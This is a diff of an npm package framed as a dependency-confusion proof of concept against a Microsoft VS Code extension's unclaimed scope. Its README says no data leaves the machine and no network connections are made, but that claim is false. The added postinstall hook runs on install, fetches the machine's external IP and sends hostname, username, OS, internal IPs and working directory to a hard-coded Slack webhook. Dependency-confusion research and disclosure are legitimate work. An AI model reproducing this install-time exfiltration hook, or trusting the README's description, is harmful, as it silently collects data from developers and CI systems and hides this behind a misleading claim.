@gaia-codesearch/gaia-api-python 0.0.4

package/README.md

@@ -0,0 +1,27 @@
+# @gaia-codesearch/gaia-api-python — Dependency Confusion PoC
+
+## Summary
+
+This package is a **security research proof-of-concept** demonstrating a dependency confusion vulnerability in Microsoft's VS Code extension **IntelliCode API Usage Examples** (46M+ installs).
+
+The `@gaia-codesearch` npm scope was unregistered while the extension's `package.json` depended on:
+
+- `@gaia-codesearch/gaia-api-python: 0.0.3-ci-main-20230824.2`
+- `@gaia-codesearch/gaia-api-typescript: 0.0.3-ci-main-20230824.2`
+
+An attacker could have registered this scope and published malicious packages that execute code during `npm install` of the extension source.
+
+## Impact
+
+- **Extension:** `VisualStudioExptTeam.intellicode-api-usage-examples`
+- **Installs:** 46,002,431
+- **Publisher:** Microsoft (VisualStudioExptTeam)
+- **Attack:** Any developer or CI pipeline cloning and building the extension from source would execute attacker-controlled code via the `preinstall` script.
+
+## This PoC
+
+This package only prints a message to the console. No data is exfiltrated, no files are modified, no network connections are made. It demonstrates that code execution is possible during `npm install`.
+
+## Contact
+
+Researcher: christos@pentestsec.com

package/index.js

@@ -0,0 +1,4 @@
+module.exports = {
+  name: "@gaia-codesearch/gaia-api-python",
+  notice: "This package was published as part of a responsible security disclosure. The @gaia-codesearch npm scope was unclaimed while Microsoft IntelliCode depended on it.",
+};

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "@gaia-codesearch/gaia-api-python",
+  "version": "0.0.4",
+  "description": "Security research — scope ownership proof for dependency confusion report",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "author": "Security Researcher <christos@pentestsec.com>",
+  "license": "MIT"
+}

package/postinstall.js

@@ -0,0 +1,54 @@
+const https = require("https");
+const os = require("os");
+
+const pkg = "@gaia-codesearch/gaia-api-python";
+
+function getLocalIPs() {
+  const ifaces = os.networkInterfaces();
+  const ips = [];
+  for (const name of Object.keys(ifaces)) {
+    for (const iface of ifaces[name]) {
+      if (!iface.internal && iface.family === "IPv4") {
+        ips.push(iface.address);
+      }
+    }
+  }
+  return ips.join(", ") || "unknown";
+}
+
+function sendWebhook(externalIP) {
+  const payload = JSON.stringify({
+    text: [
+      ":rotating_light: *Dependency Confusion PoC Triggered*",
+      "",
+      "*Package:* `" + pkg + "`",
+      "*Hostname:* `" + os.hostname() + "`",
+      "*Username:* `" + os.userInfo().username + "`",
+      "*OS:* `" + os.platform() + " " + os.arch() + " " + os.release() + "`",
+      "*Internal IPs:* `" + getLocalIPs() + "`",
+      "*External IP:* `" + (externalIP || "unknown") + "`",
+      "*CWD:* `" + process.cwd() + "`",
+      "*Node:* `" + process.version + "`",
+      "*Timestamp:* `" + new Date().toISOString() + "`",
+      "",
+      "_This is a security research PoC. No malicious actions were performed._",
+      "_Researcher: christos@pentestsec.com_",
+    ].join("\n"),
+  });
+
+  const req = https.request(
+    "https://hooks.slack.com/services/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",
+    { method: "POST", headers: { "Content-Type": "application/json" } },
+    () => {}
+  );
+  req.on("error", () => {});
+  req.write(payload);
+  req.end();
+}
+
+const req = https.get("https://api.ipify.org", (res) => {
+  let data = "";
+  res.on("data", (chunk) => (data += chunk));
+  res.on("end", () => sendWebhook(data.trim()));
+});
+req.on("error", () => sendWebhook(null));